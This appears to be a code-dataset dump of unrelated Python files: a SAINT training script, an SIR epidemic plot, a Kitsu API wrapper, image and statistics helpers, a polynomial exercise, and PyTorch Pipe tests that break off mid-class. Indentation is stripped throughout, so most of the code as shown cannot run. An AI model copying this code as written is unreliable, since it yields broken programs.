# above function returns x_d which is a dictionary of numpy array of x data values, and then the mask, and then
# row filtered based on an index
X_train, y_train = data_split(X, y, nan_mask, train_indices)
X_valid, y_valid = data_split(X, y, nan_mask, valid_indices)
X_test, y_test = data_split(X, y, nan_mask, test_indices)
train_mean, train_std = np.array(X_train['data'][:, con_idxs], dtype=np.float32).mean(0), np.array(
X_train['data'][:, con_idxs], dtype=np.float32).std(0)
train_std = np.where(train_std < 1e-6, 1e-6, train_std)
# import ipdb; ipdb.set_trace()
####DONE
print('Downloading and processing the dataset, it might take some time.')
#cat_dims, cat_idxs, con_idxs, X_train, y_train, X_valid, y_valid, X_test, y_test, train_mean, train_std = data_prep_openml(opt.dset_id, opt.dset_seed,opt.task, datasplit=[.65, .15, .2])
# I scrubbed the above line because I gutted it in the above section
continuous_mean_std = np.array([train_mean,train_std]).astype(np.float32)
##### Setting some hyperparams based on inputs and dataset
_,nfeat = X_train['data'].shape
# this just gets the number of features in the x matrix
if nfeat > 100:
opt.embedding_size = min(8,opt.embedding_size)
opt.batchsize = min(64, opt.batchsize)
if opt.attentiontype != 'col':
opt.transformer_depth = 1
opt.attention_heads = min(4,opt.attention_heads)
opt.attention_dropout = 0.8
opt.embedding_size = min(32,opt.embedding_size)
opt.ff_dropout = 0.8
print(nfeat,opt.batchsize)
print(opt)
if opt.active_log:
wandb.config.update(opt)
##### gutting the datasetcatcon class
# # class DataSetCatCon(Dataset):
# # def __init__(self, X, Y, cat_cols, task='clf', continuous_mean_std=None):
#
# _X = X_train
# # that data dict thing
# _Y = y_train
# # the y dict
# _cat_cols = cat_idxs
# # indices of categorical columns
# _task = opt.dtask
# # 'clf' in our case
# _continuous_mean_std = continuous_mean_std
#
# _cat_cols = list(_cat_cols)
# # redundant
# _X_mask = _X['mask'].copy()
# # getting the mask of that data dict
# _X = _X['data'].copy()
# # getting the X element of that data dict
# _con_cols = list(set(np.arange(_X.shape[1])) - set(_cat_cols))
# # the continuous column indices
# _X1 = _X[:, _cat_cols].copy().astype(np.int64) # categorical columns
# # broken off categorical columns
# _X2 = _X[:, _con_cols].copy().astype(np.float32) # numerical columns
# # broken off numerical columns
#
# _X1_mask = _X_mask[:, _cat_cols].copy().astype(np.int64) # categorical columns
# # broken off categorical missing value mask
#
# _X2_mask = _X_mask[:, _con_cols].copy().astype(np.int64) # numerical columns
# # broken off numerical missing value mask
#
# if task == 'clf':
# _y = _Y['data'] # .astype(np.float32)
# else:
# _y = _Y['data'].astype(np.float32)
# # just grabbing that y vector
#
# _cls = np.zeros_like(_y, dtype=int)
# # get a bunch of zeros in the same dimensionality as y vector
#
# _cls_mask = np.ones_like(_y, dtype=int)
# # get a bunch of ones in same dimensionality as y vector
#
#
# if continuous_mean_std is not None:
# _mean, _std = continuous_mean_std
# _X2 = (_X2 - _mean) / _std
# z normalize only the continuous x columns
#
# # def __len__(self):
# return len(self.y)
#
# # def __getitem__(self, idx):
# # X1 has categorical data, X2 has continuous
# return np.concatenate((self.cls[idx], self.X1[idx])), self.X2[idx], self.y[idx], np.concatenate(
# (self.cls_mask[idx], self.X1_mask[idx])), self.X2_mask[idx]
# note that they are not converting it to a torch tensor.. they must do it at some point...
train_ds = DataSetCatCon(X_train, y_train, cat_idxs,opt.dtask,continuous_mean_std)
trainloader = DataLoader(train_ds, batch_size=opt.batchsize, shuffle=True,num_workers=4)
# a single element looks like this:
# (array([0, 4, 1, 2, 0, 1, 0, 2, 8, 3]),
# this one is like the categorical vector, with a leading zero appended to it. Andrew suggests it might be the token they mention in the paper
# array([ 1.5994084 , 0.25852484, -1.2972844 , 0.01338016, -0.5672942 ,
# -0.41616383, -0.2361183 ], dtype=float32),
# this one is the continuous element of the vector
# array([0]),
# this is the y-element of a vector
# array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1]),
# broken off categorical missing value mask with a leading 1 appended to it. that's because that 0 element is not missing
# array([1, 1, 1, 1, 1, 1, 1]))
# broken off numerical missing value mask
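# A short inspection sketch (added, not in the original script): unpack one element of
# train_ds to make the five-part structure described above concrete. Indexing relies on
# the __getitem__ shown in the gutted class above.
sample_categ, sample_cont, sample_y, sample_cat_mask, sample_con_mask = train_ds[0]
print(sample_categ.shape, sample_cont.shape, sample_y, sample_cat_mask.shape, sample_con_mask.shape)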
valid_ds = DataSetCatCon(X_valid, y_valid, cat_idxs,opt.dtask, continuous_mean_std)
validloader = DataLoader(valid_ds, batch_size=opt.batchsize, shuffle=False,num_workers=4)
test_ds = DataSetCatCon(X_test, y_test, cat_idxs,opt.dtask, continuous_mean_std)
testloader = DataLoader(test_ds, batch_size=opt.batchsize, shuffle=False,num_workers=4)
if opt.task == 'regression':
y_dim = 1
else:
y_dim = len(np.unique(y_train['data'][:,0]))
cat_dims = np.append(np.array([1]),np.array(cat_dims)).astype(int) #Appending 1 for CLS token, this is later used to generate embeddings.
# note in this implementation, we are passing a bunch of hyperparams directly to the model class
model = SAINT(
categories = tuple(cat_dims), # remember there's a leading 1 here.. array([ 1, 12, 3, 4, 2, 2, 2, 3, 12, 4])
num_continuous = len(con_idxs), # continuous indices: [0, 5, 9, 11, 12, 13, 14]
dim = opt.embedding_size, # via config: 32
dim_out = 1, # I think just a single output?
depth = opt.transformer_depth, # in our case, overridden to 1
heads = opt.attention_heads, # in our case, 4
attn_dropout = opt.attention_dropout, # in our case, overridden to 0.8
ff_dropout = opt.ff_dropout, # in our case, overridden to 0.8
mlp_hidden_mults = (4, 2), # I think these are feedforward hidden layers
cont_embeddings = opt.cont_embeddings, # i forget what this does
attentiontype = opt.attentiontype, # colrow aka vanilla SAINT
final_mlp_style = opt.final_mlp_style, # it's 'sep' but honestly i don't know what this does
y_dim = y_dim #dimensionality of objective, in this case 2
)
vision_dset = opt.vision_dset
if y_dim == 2 and opt.task == 'binary':
# opt.task = 'binary'
criterion = nn.CrossEntropyLoss().to(device)
elif y_dim > 2 and opt.task == 'multiclass':
# opt.task = 'multiclass'
criterion = nn.CrossEntropyLoss().to(device)
elif opt.task == 'regression':
criterion = nn.MSELoss().to(device)
else:
raise ValueError('case not written yet')
model.to(device)
if opt.pretrain:
from pretraining import SAINT_pretrain
model = SAINT_pretrain(model, cat_idxs,X_train,y_train, continuous_mean_std, opt,device)
## Choosing the optimizer
if opt.optimizer == 'SGD':
optimizer = optim.SGD(model.parameters(), lr=opt.lr,
momentum=0.9, weight_decay=5e-4)
from utils import get_scheduler
scheduler = get_scheduler(opt, optimizer)
elif opt.optimizer == 'Adam':
optimizer = optim.Adam(model.parameters(),lr=opt.lr)
elif opt.optimizer == 'AdamW':
optimizer = optim.AdamW(model.parameters(),lr=opt.lr)
best_valid_auroc = 0
best_valid_accuracy = 0
best_test_auroc = 0
best_test_accuracy = 0
best_valid_rmse = 100000
print('Training begins now.')
for epoch in range(opt.epochs):
model.train()
running_loss = 0.0
for i, data in enumerate(trainloader, 0):
optimizer.zero_grad()
# x_categ is the categorical data, x_cont has continuous data, y_gts has ground truth ys. cat_mask is an array of ones same shape as x_categ and an additional column (corresponding to CLS token) set to 0s. con_mask is an array of ones same shape as x_cont.
x_categ, x_cont, y_gts, cat_mask, con_mask = data[0].to(device), data[1].to(device),data[2].to(device),data[3].to(device),data[4].to(device)
# We are converting the data to embeddings in the next step
_ , x_categ_enc, x_cont_enc = embed_data_mask(x_categ, x_cont, cat_mask, con_mask,model,vision_dset)
reps = model.transformer(x_categ_enc, x_cont_enc)
# select only the representations corresponding to CLS token and apply mlp on it in the next step to get the predictions.
y_reps = reps[:,0,:]
y_outs = model.mlpfory(y_reps)
if opt.task == 'regression':
loss = criterion(y_outs,y_gts)
else:
loss = criterion(y_outs,y_gts.squeeze())
loss.backward()
optimizer.step()
if opt.optimizer == 'SGD':
scheduler.step()
running_loss += loss.item()
# print(running_loss)
if opt.active_log:
wandb.log({'epoch': epoch ,'train_epoch_loss': running_loss,
'loss': loss.item()
})
if epoch%5==0:
model.eval()
with torch.no_grad():
if opt.task in ['binary','multiclass']:
accuracy, auroc = classification_scores(model, validloader, device, opt.task,vision_dset)
test_accuracy, test_auroc = classification_scores(model, testloader, device, opt.task,vision_dset)
print('[EPOCH %d] VALID ACCURACY: %.3f, VALID AUROC: %.3f' %
(epoch + 1, accuracy,auroc ))
print('[EPOCH %d] TEST ACCURACY: %.3f, TEST AUROC: %.3f' %
(epoch + 1, test_accuracy,test_auroc ))
if opt.active_log:
wandb.log({'valid_accuracy': accuracy ,'valid_auroc': auroc })
wandb.log({'test_accuracy': test_accuracy ,'test_auroc': test_auroc })
if opt.task =='multiclass':
if accuracy > best_valid_accuracy:
best_valid_accuracy = accuracy
best_test_auroc = test_auroc
best_test_accuracy = test_accuracy
torch.save(model.state_dict(),'%s/bestmodel.pth' % (modelsave_path))
else:
if accuracy > best_valid_accuracy:
best_valid_accuracy = accuracy
# if auroc > best_valid_auroc:
# best_valid_auroc = auroc
best_test_auroc = test_auroc
best_test_accuracy = test_accuracy
torch.save(model.state_dict(),'%s/bestmodel.pth' % (modelsave_path))
else:
valid_rmse = mean_sq_error(model, validloader, device,vision_dset)
test_rmse = mean_sq_error(model, testloader, device,vision_dset)
print('[EPOCH %d] VALID RMSE: %.3f' %
(epoch + 1, valid_rmse ))
print('[EPOCH %d] TEST RMSE: %.3f' %
(epoch + 1, test_rmse ))
if opt.active_log:
wandb.log({'valid_rmse': valid_rmse ,'test_rmse': test_rmse })
if valid_rmse < best_valid_rmse:
best_valid_rmse = valid_rmse
best_test_rmse = test_rmse
torch.save(model.state_dict(),'%s/bestmodel.pth' % (modelsave_path))
model.train()
total_parameters = count_parameters(model)
print('TOTAL NUMBER OF PARAMS: %d' %(total_parameters))
if opt.task =='binary':
print('AUROC on best model: %.3f' %(best_test_auroc))
elif opt.task =='multiclass':
print('Accuracy on best model: %.3f' %(best_test_accuracy))
else:
print('RMSE on best model: %.3f' %(best_test_rmse))
if opt.active_log:
if opt.task == 'regression':
wandb.log({'total_parameters': total_parameters, 'test_rmse_bestep':best_test_rmse ,
'cat_dims':len(cat_idxs) , 'con_dims':len(con_idxs) })
else:
wandb.log({'total_parameters': total_parameters, 'test_auroc_bestep':best_test_auroc ,
'test_accuracy_bestep':best_test_accuracy,'cat_dims':len(cat_idxs) , 'con_dims':len(con_idxs) })
|
StarcoderdataPython
|
1732255
|
### SCIPY AND MATPLOTLIB
import numpy as np
#from scipy.special import jn
# example with a Bessel function (Rosalind Franklin photo)
#x = np.linspace(xmin, xmax, npts)
#layers = np.array([jn(i, x)**2 for i in range(nlayers)])
#maxi = [(np.diff(np.sign(np.diff(layers[i,:]))) < 0).nonzero()[0] + 1
# for i in range(nlayers)]
### EXAMPLE OF THE SIR EPIDEMIOLOGICAL MODEL
#from scipy.integrate import odeint
#import matplotlib.pyplot as plt
#SI: Viral diseases that cause lifelong infection, such as HIV.
#SIS: Diseases that confer no immunity after infection
#SIR: Viral diseases in which, once infected, lifelong immunity is acquired
#def deriv(y, t, N, beta, gamma):
#S, I, R = y
#dSdt = -beta * S * I / N
#dIdt = beta * S * I / N - gamma * I
#dRdt = gamma * I
#return dSdt, dIdt, dRdt
# Initial conditions vector
#y0 = S0, I0, R0
# Integrate the SIR equations over the time grid, t.
#ret = odeint(deriv, y0, t, args=(N, beta, gamma))
#S, I, R = ret.T
### Interactive plot
from scipy.integrate import odeint
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, RadioButtons # Interactivo
def dySIS(y, t, lamda, mu): # SI/SIS model
dy_dt = lamda*y*(1-y)-mu*y
return dy_dt
def dySIR(y, t, lamda, mu): # SIR model,
i, s = y
di_dt = lamda*s*i-mu*i
ds_dt = -lamda*s*i
return np.array([di_dt,ds_dt])
# parameter values
number = 1e5 # total number of people
lamda = 0.2 # Daily contact rate, the average number of susceptible persons who are effectively in contact with the sick each day
sigma = 2.5 # Number of contacts during infectious period
mu = lamda/sigma # Daily cure rate, the ratio of the number of patients cured each day to the total number of patients
tEnd = 200 # Forecast date length
t = np.arange(0.0,tEnd,1) # (start,stop,step)
i0 = 1e-4 # Initial value of the proportion of patients
s0 = 1-i0 # Initial value of the proportion of susceptible persons
Y0 = (i0, s0) # Initial value of the differential equation system
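# Sanity check (added note, not in the original script): sigma plays the role of the
# basic reproduction number R0 = lamda / mu, which is why mu was derived above as
# lamda / sigma.
assert abs(sigma - lamda / mu) < 1e-12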
ySI = odeint(dySIS, i0, t, args=(lamda,0)) # SI model
ySIS = odeint(dySIS, i0, t, args=(lamda,mu)) # SIS model
ySIR = odeint(dySIR, Y0, t, args=(lamda,mu)) # SIR model
# Plot
fig, ax = plt.subplots()
plt.subplots_adjust(left=0.25, bottom=0.4)
plt.title("Comparison among SI, SIS and SIR models")
plt.xlabel('time')
plt.axis([0, tEnd, -0.1, 1.1])
si_plt, = plt.plot(t, ySI,':g', label='i(t)-SI')
sis_plt, = plt.plot(t, ySIS,'--g', label='i(t)-SIS')
sir_i_plt, = plt.plot(t, ySIR[:,0],'-r', label='i(t)-SIR')
sir_s_plt, = plt.plot(t, ySIR[:,1],'-b', label='s(t)-SIR')
sir_r_plt, = plt.plot(t, 1-ySIR[:,0]-ySIR[:,1],'-m', label='r(t)-SIR')
plt.legend(loc='best') # pick the best location
# Add interactive sliders
axcolor = 'lightgoldenrodyellow'
# Generate the slider axes
axlambda = plt.axes([0.25, 0.1, 0.65, 0.03], facecolor=axcolor)
axsigma = plt.axes([0.25, 0.18, 0.65, 0.03], facecolor=axcolor)
axi0 = plt.axes([0.25, 0.26, 0.65, 0.03], facecolor=axcolor)
# Add the slider widgets
slambda = Slider(axlambda, 'Daily contact rate', 0.1, 1,
valinit=lamda, color="green")
ssigma = Slider(axsigma, 'Contacts during\ninfectious period', 0.1, 10,
valinit=sigma)
si0 = Slider(axi0, 'Initial proportion\nof patients', 1e-4, 5e-1,
valinit=i0, color="orange")
plt.show()
### update function
def update(val):
lamda = slambda.val
sigma = ssigma.val
i0 = si0.val
mu = lamda / sigma
s0 = 1 - i0
Y0 = (i0, s0)
ySI = odeint(dySIS, i0, t, args=(lamda, 0)) # SI model
ySIS = odeint(dySIS, i0, t, args=(lamda, mu)) # SIS model
ySIR = odeint(dySIR, Y0, t, args=(lamda, mu)) # SIR model
si_plt.set_ydata(ySI)
sis_plt.set_ydata(ySIS)
sir_i_plt.set_ydata(ySIR[:, 0])
sir_s_plt.set_ydata(ySIR[:, 1])
sir_r_plt.set_ydata(1 - ySIR[:, 0] - ySIR[:, 1])
fig.canvas.draw_idle()
plt.show()
### apply the update function
slambda.on_changed(update)
ssigma.on_changed(update)
si0.on_changed(update)
### radio buttons to show a single model type
rax = plt.axes([0.025, 0.5, 0.15, 0.15], facecolor=axcolor)
radio = RadioButtons(rax, ('SI', 'SIS', 'SIR'), active=0)
lines = {'SI':[si_plt], 'SIS':[sis_plt],
'SIR':[sir_i_plt, sir_s_plt, sir_r_plt]}
def select_model(label):
# the selected line is not transparent
for line_m in lines[label]:
line_m.set_alpha(1)
# the other lines become transparent
for others in set(lines.keys()) - set([label]):
for line_m in lines[others]:
line_m.set_alpha(0)
fig.canvas.draw_idle()
# whichever option is clicked will be shown
radio.on_clicked(select_model)
plt.show()
|
StarcoderdataPython
|
3222331
|
from .anime import *
from .user import *
from .library import *
from .manga import *
from .drama import *
from .auth import *
from .mappings import *
class Kitsu:
"""
:ivar KitsuAnime anime: Instance interface for the Kitsu Anime endpoints
:ivar KitsuUser user: Instance interface for the Kitsu User endpoints
:ivar KitsuLib library: Instance interface for the Kitsu Library endpoints.
:ivar KitsuManga manga: Instance interface for the Kitsu Manga endpoints.
:ivar KitsuDrama drama: Instance interface for the Kitsu Drama endpoints.
:ivar KitsuAuth auth: Instance interface for the Kitsu Auth endpoints / storage engine.
"""
def __init__(self, cid, csecret):
"""
Initialize a new Kitsu API instance.
"""
api = "https://kitsu.io/api/edge"
header = {
'User-Agent': 'Pymoe (git.vertinext.com/ccubed/Pymoe)',
'Accept': 'application/vnd.api+json',
'Content-Type': 'application/vnd.api+json'
}
self.anime = KitsuAnime(api, header)
self.manga = KitsuManga(api, header)
self.drama = KitsuDrama(api, header)
self.library = KitsuLib(api, header)
self.mappings = KitsuMappings(api, header)
self.user = KitsuUser(api, header)
self.auth = KitsuAuth(header, cid, csecret)
|
StarcoderdataPython
|
4823453
|
import numpy as np
from scipy.signal import convolve
def gbp(img):
g1 = np.array([[-1,0,1]])
g2 = np.array([[-1],[0],[1]])
g3 = np.array([[0,0,1],[0,0,0],[-1,0,0]])
g4 = np.array([[-1,0,0],[0,0,0],[0,0,1]])
rg1 = convolve(img, g1, mode="same")
rg2 = convolve(img, g2, mode="same")
rg3 = convolve(img, g3, mode="same")
rg4 = convolve(img, g4, mode="same")
s1 = (np.abs(rg1) - np.abs(rg4)) >= 0
s2 = (np.abs(rg3) - np.abs(rg4)) >= 0
s3 = (np.abs(rg1) - np.abs(rg2)) >= 0
s7 = (np.abs(rg1)) >= 0
s6 = (np.abs(rg2)) >= 0
s5 = (np.abs(rg3)) >= 0
s4 = (np.abs(rg4)) >= 0
gbp_im = s1*(2**0) + s2*(2**1) + s3*(2**2) + s4*(2**3) + s5*(2**4) + s6*(2**5) + s7*(2**6)
return gbp_im
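# A minimal usage sketch (added; the random image below is a stand-in, not part of the
# original file): gbp() expects a 2-D grayscale array and returns an integer code per
# pixel (at most 2**7 - 1 = 127) built from the seven thresholded gradient responses above.
if __name__ == "__main__":
    demo_img = np.random.rand(64, 64)  # hypothetical grayscale image
    codes = gbp(demo_img)
    print(codes.shape, codes.min(), codes.max())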
|
StarcoderdataPython
|
1646361
|
<filename>qufilab/indicators/stat.py
"""
@ Qufilab, 2020.
@ <NAME>
Python interface for statistics indicators.
"""
import numpy as np
from qufilab.indicators._stat import *
def std(data, periods, normalize = True):
"""
.. Standard Deviation
Parameters
----------
data : `ndarray`
An array containing values.
periods : `int`
Number of periods to be used.
normalize : `bool`, optional
Specify whether to normalize the standard deviation with
n - 1 instead of n.
Defaults to True.
Returns
-------
`ndarray`
An array containing standard deviation values for the specified periods.
Examples
--------
>>> import qufilab as ql
>>> import numpy as np
...
>>> # Load a sample dataframe.
>>> df = ql.load_sample('MSFT')
>>> print(df['close'].dtype)
float64
>>> std = ql.std(df['close'], periods = 10)
>>> print(std)
[nan nan nan ... 3.31897842 2.9632574 3.02394683]
"""
return std_calc(data, periods, normalize)
def var(data, periods, normalize = True):
"""
.. Variance
Parameters
----------
data : `ndarray`
An array containing values.
periods : `int`
Number of periods to be used.
normalize : `bool`, optional
Specify whether to normalize the standard deviation with
n - 1 instead of n.
Defaults to `True`.
Returns
-------
`ndarray`
An array containing variance values.
Examples
--------
>>> import qufilab as ql
>>> import numpy as np
...
>>> # Load a sample dataframe.
>>> df = ql.load_sample('MSFT')
>>> print(df['close'].dtype)
float64
>>> var = ql.var(df['close'], periods = 10)
>>> print(var)
[nan nan nan ... 11.01561778 8.78089444 9.14425444]
"""
return var_calc(data, periods, normalize)
def cov(data, market, periods, normalize = True):
"""
.. Covariance
Parameters
----------
data : `ndarray`
An array containing values.
market : `ndarray`
An array containing market values to be used as the comparison
when calculating beta.
periods : `int`
Number of periods to be used.
normalize : `bool`, optional
Specify whether to normalize covariance with
n - 1 instead of n.
Defaults to `True`.
Returns
-------
`ndarray`
An array containing covariance values.
Examples
--------
>>> import qufilab as ql
>>> import numpy as np
...
>>> # Load sample dataframe.
>>> df = ql.load_sample('MSFT')
>>> df_market = ql.load_sample('DJI')
>>> cov = ql.cov(df['close'], df_market['close'], periods = 10)
>>> print(cov)
[nan nan nan ... -360.37842558 -99.1077715 60.84627274]
"""
return cov_calc(data, market, periods, normalize)
def beta(data, market, periods, normalize = False):
"""
.. Beta
Parameters
----------
data : `ndarray`
An array containing values.
market : `ndarray`
An array containing market values to be used as the comparison
when calculating beta.
periods : `int`
Number of periods to be used.
normalize : `bool`, optional
Specify whether to normalize the standard deviation calculation
within the beta calculation with n - 1 instead of n.
Defaults to False.
Returns
-------
`ndarray`
An array containing beta values.
Examples
--------
>>> import qufilab as ql
>>> import numpy as np
...
>>> # Load sample dataframe.
>>> df = ql.load_sample('MSFT')
>>> df_market = ql.load_sample('DJI')
>>> beta = ql.beta(df['close'], df_market['close'], periods = 10)
>>> print(beta)
[nan nan nan ... 0.67027616 0.45641977 0.3169785]
"""
return beta_calc(data, market, periods, normalize)
def pct_change(data, periods):
"""
.. Percentage Change
Parameters
----------
data : `ndarray`
An array containing values.
periods : `int`
Number of periods to be used.
Returns
-------
`ndarray`
An array containing percentage change for the specified periods.
Examples
--------
>>> import qufilab as ql
>>> import numpy as np
...
>>> # Load sample dataframe.
>>> df = ql.load_sample('MSFT')
>>> pct_change = ql.pct_change(df['close'], periods = 10)
>>> print(pct_change)
[nan nan nan ... -1.52155537 -0.81811879 0.25414157]
"""
return pct_change_calc(data, periods)
|
StarcoderdataPython
|
99362
|
<filename>Codes/Data_Structures/Week_2/Polynomial.py
'''
# Multiplication and addition of univariate polynomials
Design functions to compute the product and the sum of two univariate polynomials.
Input format:
The input consists of 2 lines. Each line first gives the number of nonzero terms of a
polynomial, then lists the coefficient and exponent of each nonzero term in order of
decreasing exponent (all integers with absolute value not exceeding 1000). Numbers are
separated by spaces.
Output format:
The output consists of 2 lines, giving the coefficients and exponents of the nonzero
terms of the product polynomial and then the sum polynomial, in order of decreasing
exponent. Numbers are separated by spaces, with no trailing space. A zero polynomial
should be output as 0 0.
Sample input:
4 3 4 -5 2 6 1 -2 0
3 5 20 -7 4 3 1
Sample output:
15 24 -25 22 30 21 -10 20 -21 8 35 6 -33 5 14 4 -15 3 18 2 -6 1
5 20 -4 4 -5 2 9 1 -2 0
'''
# Honestly too lazy to implement this in C (emmmm, mainly because the course slides already implement it and I didn't want to just copy it). The first few problems this week wore me down a bit, so let me write the last one in Python to unwind for a while...
import re
class Polynomial():
def __init__(self, args = []):
self.args = {}
for i in range(len(args)//2):
self.args[int(args[2*i+1])] = int(args[2*i])
# print(self.args)
def add(self, poly):
p = Polynomial()
p.args = dict(self.args)  # copy so add() does not mutate self.args
for k, v in poly.args.items():
if p.args.get(k):
p.args[k] += v
if p.args[k] == 0:
del p.args[k]
else:
p.args[k] = v
if not len(p.args):
p.args[0] = 0
return p
def multiplication(self, poly):
p = Polynomial()
for k2, v2 in poly.args.items():
for k1, v1 in self.args.items():
if p.args.get(k1+k2):
p.args[k1+k2] += v1 * v2
if p.args[k1+k2] == 0:
del p.args[k1+k2]
else:
p.args[k1+k2] = v1 * v2
if not len(p.args):
p.args[0] = 0
return p
def __str__(self):
argsList = []
args = sorted(self.args.items(), key = lambda item:item[0],reverse=True)
for k, v in args:
argsList.append(v)
argsList.append(k)
return ' '.join(list(map(str, argsList)))
def main():
poly1 = Polynomial(re.split(r" +",input())[1:])
poly2 = Polynomial(re.split(r" +",input())[1:])
print(poly1.multiplication(poly2))
print(poly1.add(poly2))
if __name__ == '__main__':
main()
'''
Tests
6 1 2 1 1
3 1 1 -1 0
'''
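# A hedged direct-use sketch (added; it mirrors the sample input above without stdin):
#
#   p1 = Polynomial(['3', '4', '-5', '2', '6', '1', '-2', '0'])
#   p2 = Polynomial(['5', '20', '-7', '4', '3', '1'])
#   print(p1.multiplication(p2))  # expected: 15 24 -25 22 30 21 ... -6 1
#   print(p1.add(p2))             # expected: 5 20 -4 4 -5 2 9 1 -2 0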
|
StarcoderdataPython
|
4824935
|
# Copyright 2019 <NAME>
#
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
#
# This source code is licensed under the BSD license found in the
# LICENSE file in the root directory of this source tree.
from collections import OrderedDict
from copy import deepcopy
import time
import pytest
import random
import torch
from torch import nn
from torch import Tensor
from torch.distributed.pipeline.sync import Pipe, NoChunk, WithDevice
from torch.distributed.pipeline.sync.pipe import PipeSequential
skip_if_no_cuda = pytest.mark.skipif(not torch.cuda.is_available(), reason="cuda required")
def test_pipe_without_rpc():
model = nn.Sequential(nn.Linear(1, 1))
with pytest.raises(RuntimeError, match='Please initialize RPC framework'):
pipe = Pipe(model, chunks=1)
def test_parameters(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
pipe = Pipe(model, chunks=1)
assert list(pipe.parameters()) != []
def test_public_attrs(setup_rpc):
class MyString:
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
model = nn.Sequential(nn.Linear(1, 1))
pipe = Pipe(model, chunks=42.000, checkpoint=MyString("always"))
assert pipe.devices == [torch.device("cpu")]
assert pipe.chunks == 42
assert isinstance(pipe.chunks, int)
assert pipe.checkpoint == "always"
assert isinstance(pipe.checkpoint, str)
def test_sequential_like(setup_rpc):
a = nn.Linear(1, 1)
b = nn.Linear(1, 1)
model = nn.Sequential(a, b)
model = Pipe(model)
assert len(model) == 2
assert list(model) == [a, b]
assert model[0] is a
assert model[1] is b
with pytest.raises(IndexError):
_ = model[2]
assert model[-1] is b
assert model[-2] is a
def test_chunks_less_than_1(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
with pytest.raises(ValueError):
Pipe(model, chunks=0)
with pytest.raises(ValueError):
Pipe(model, chunks=-1)
def test_batch_size_indivisible(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
model = Pipe(model, chunks=4)
with pytest.warns(None) as record:
model(torch.rand(7, 1))
# Indivisible batch size is legal.
assert not record
def test_batch_size_small(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
model = Pipe(model, chunks=4)
with pytest.warns(None) as record:
model(torch.rand(2, 1))
# Batch size smaller than chunks is legal.
assert not record
def test_checkpoint_mode(setup_rpc):
def count_grad_fn(grad_fn, name, visited=None):
if visited is None:
visited = set()
if grad_fn in visited:
return 0
visited.add(grad_fn)
if grad_fn is None:
return 0
if grad_fn.__class__.__name__ == name:
return 1
counter = 0
for next_grad_fn, _ in grad_fn.next_functions:
counter += count_grad_fn(next_grad_fn, name, visited=visited)
return counter
model = nn.Sequential(nn.Linear(1, 1))
input = torch.rand(2, 1)
always = Pipe(model, chunks=2, checkpoint="always")
except_last = Pipe(model, chunks=2, checkpoint="except_last")
never = Pipe(model, chunks=2, checkpoint="never")
always_output = always(input)
except_last_output = except_last(input)
never_output = never(input)
assert count_grad_fn(always_output.local_value().grad_fn, "CheckpointBackward") == 2
assert count_grad_fn(except_last_output.local_value().grad_fn, "CheckpointBackward") == 1
assert count_grad_fn(never_output.local_value().grad_fn, "CheckpointBackward") == 0
def test_checkpoint_mode_invalid(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
with pytest.raises(ValueError, match="checkpoint is not one of 'always', 'except_last', or 'never'"):
Pipe(model, chunks=2, checkpoint="INVALID_CHECKPOINT")
def test_checkpoint_mode_when_chunks_1(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
# All checkpoint modes are fine.
Pipe(model, chunks=1, checkpoint="except_last")
Pipe(model, chunks=1, checkpoint="always")
Pipe(model, chunks=1, checkpoint="never")
def test_checkpoint_eval(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
model = Pipe(model, chunks=2)
input = torch.rand(2, 1)
def find_grad_fn(grad_fn, name):
if grad_fn is None:
return False
if grad_fn.__class__.__name__ == name:
return True
for next_grad_fn, _ in grad_fn.next_functions:
if find_grad_fn(next_grad_fn, name):
return True
return False
model.train()
train_output = model(input)
assert find_grad_fn(train_output.local_value().grad_fn, "CheckpointBackward")
assert find_grad_fn(train_output.local_value().grad_fn, "RecomputeBackward")
model.eval()
eval_output = model(input)
assert not find_grad_fn(eval_output.local_value().grad_fn, "CheckpointBackward")
assert not find_grad_fn(eval_output.local_value().grad_fn, "RecomputeBackward")
def test_checkpoint_non_float_input(setup_rpc):
class ForkNonFloat(nn.Module):
def forward(self, input):
return (input * 2, torch.tensor([False]))
class JoinNonFloat(nn.Module):
def forward(self, input, non_float):
return input * 2
model = nn.Sequential(ForkNonFloat(), JoinNonFloat())
model = Pipe(model, chunks=1, checkpoint="always")
input = torch.rand(1, requires_grad=True)
output = model(input)
output.backward()
def test_no_grad(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
model = Pipe(model, chunks=2)
input = torch.rand(2, 1)
latent = None
def hook(module, input, output):
_ = module
_ = input
nonlocal latent
latent = output
partition = model.partitions[0]
partition.register_forward_hook(hook)
with torch.no_grad():
model(input)
assert latent.grad_fn is None
def test_exception(setup_rpc):
class ExpectedException(Exception):
pass
class Raise(nn.Module):
def forward(self, *_):
raise ExpectedException()
model = nn.Sequential(Raise())
model = Pipe(model, chunks=1)
with pytest.raises(ExpectedException):
model(torch.rand(1))
def test_exception_early_stop_asap(setup_rpc):
"""Even the first partitions have finished to process, the partition before
the failed partition should be killed as soon as possible.
"""
class ExpectedException(Exception):
pass
class Pass(nn.Module):
def forward(self, x):
return x
counter = 0
class Counter(nn.Module):
def forward(self, x):
time.sleep(0.1)
nonlocal counter
counter += 1
return x
class Raise(nn.Module):
def forward(self, x):
raise ExpectedException()
model = nn.Sequential(Pass(), Pass(), Counter(), Raise())
model = Pipe(model, chunks=3)
with pytest.raises(ExpectedException):
model(torch.rand(3))
# If the early stop doesn't work, it would be 3 instead.
assert counter == 2
def test_nested_input(setup_rpc):
class NestedInput(nn.Module):
def __init__(self):
super().__init__()
self.fc_a = nn.Linear(1, 1)
self.fc_b = nn.Linear(1, 1)
def forward(self, inp):
return inp
model = nn.Sequential(NestedInput())
model = Pipe(model, chunks=2)
a = torch.rand(10, 1, requires_grad=True)
b = torch.rand(10, 1, requires_grad=True)
# TypeError: expected Tensor, but got tuple
with pytest.raises(TypeError):
model((a, (a, b))).local_value()
# TypeError: expected Tensor, but got list
with pytest.raises(TypeError):
model((a, [a, b])).local_value()
def test_input_pair(setup_rpc):
class Two(nn.Module):
def __init__(self):
super().__init__()
self.fc_a = nn.Linear(1, 1)
